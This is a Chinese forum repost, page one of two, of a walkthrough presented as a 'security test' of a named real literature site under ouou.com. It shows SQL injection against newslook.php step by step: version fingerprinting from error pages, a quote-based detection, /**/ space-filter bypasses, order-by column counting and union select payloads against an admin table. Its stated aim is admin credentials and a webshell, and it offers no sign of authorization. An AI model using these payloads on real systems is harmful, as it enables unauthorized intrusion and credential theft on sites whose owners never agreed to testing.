• 设为首页
  • 收藏本站
  • 积分充值
  • VIP赞助
  • 手机版
  • 微博
  • 微信
    微信公众号 添加方式:
    1:搜索微信号(888888
    2:扫描左侧二维码
  • 快捷导航
    福建二哥 门户 查看主题

    对纵横时空文学站的一次安全检测

    发布者: 涵韵 | 发布时间: 2025-6-27 15:25| 查看数: 49| 评论数: 0|帖子模式

    纵横时空文学站地址为http://xxx.ouou.com/,是ouou网站下属的一个文学小说的网站。 界面做的非常漂亮. 初步看了下为PHP MYSQL的架构PHP版本为PHP/5.1.4-0.1. 。WEBSERVER使用的是Apache/2.0.55 基于以上几点应该大概能判断出服务器应该是使用的UNIX . 这种架构应该为典型的P M U的架构了 也就是PHP MYSQL UNIX 。 可能有读者会问了 ? 你怎么知道他的Apache跟MYSQL的版本呢? 其实这个很简单。 在WEB随便输入一个不存在的页面 看下暴错信息就OK了。  如图1  



        看到图1我们了解了网站的大概情况 首先就来查找注射漏洞。 随便打开一个带有参数的连接 地址为http://xzx.ouou.com/newslook.php?id=29  输入一个单引号检测, 成功返回错误信息, 并且暴出了WEB绝对路径,如图2



        错误信息如下:

        Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /data/webroot/zh/newslook.php on line 264

    通过错误信息得知WEB路径为/data/webroot/zh/newslook.php通过路径可以肯定服务器为UNIX

        继续使用and 1=1 1=2来判断是不是真的存在注射漏洞

        http://xx.ouou.com/newslook.php?id=29【/**/and/**/1=1】/**/and/**/1=1 作用与我们在ASP注射中的 and 1=1的效果是一样的,因为有些站会过滤■空格,/**/是替代空格的。返回正常

        继续http://xx.ouou.com/newslook.php?id=29【/**/and/**/1=2】

        返回错误, 现在可以肯定http://xx.ouou.com/newslook.php?id=29 这个地址存在注射漏洞。

        既然存在漏洞,我们就来通过注射点来查找到管理员的密码从而登陆后台来取得WEBSHELL。 现在来爆一下他的有多少个字段。

        使用/**/order/**/by/**/10 来判断他的字段是不是小于10  

        http://XX.ouou.com/newslook.php?id=29【/**/order/**/by/**/10】  如图3



        如图得知我们执行/**/order/**/by/**/10 页面返回错误 说明字段是小于10的 我们继续执行

        http://ouou.com/newslook.php?id=29【/**/order/**/by/**/9】

        http://ouou.com/newslook.php?id=29【/**/order/**/by/**/8】

        http://ouou.com/newslook.php?id=29【/**/order/**/by/**/7】

        http://ouou.com/newslook.php?id=29【/**/order/**/by/**/6】

        http://.ouou.com/newslook.php?id=29【/**/order/**/by/**/5】

        http://ouou.com/newslook.php?id=29【/**/order/**/by/**/4】

        直到执行/**/order/**/by/**/4的时候页面返回正常 如图4



    我们看到当执行/**/order/**/by/**/4到4的时候返回正常说明存在4个字段。 因为我们在前面已经得到MYSQL的版本 所以已经不用判断就知道是支持union联合查询的、

        继续猜解密码

        http://xx.ouou.com/newslook.php?id=29/**/and/**/1=2/**/union/**/select/**/1,2,3,4

        返回出几个数字,一会帐号密码会从显示出来 :)

        我们来爆字段名,经过一段时间的猜解最终确定表为admin

        http://xx.ouou.com/newslook.php?id=29/**/and/**/1=2/**/union/**/select/**/1,2,3,4/**/from/**/admin  如图5


                                                    上一页12 下一页 阅读全文
    来源:https://www.jb51.net/hack/5218.html
    免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

    本帖子中包含更多资源

    您需要 登录 才可以下载或查看,没有账号?立即注册

    ×

    最新评论

    QQ Archiver 手机版 小黑屋 福建二哥 ( 闽ICP备2022004717号|闽公网安备35052402000345号 )

    Powered by Discuz! X3.5 © 2001-2023

    快速回复 返回顶部 返回列表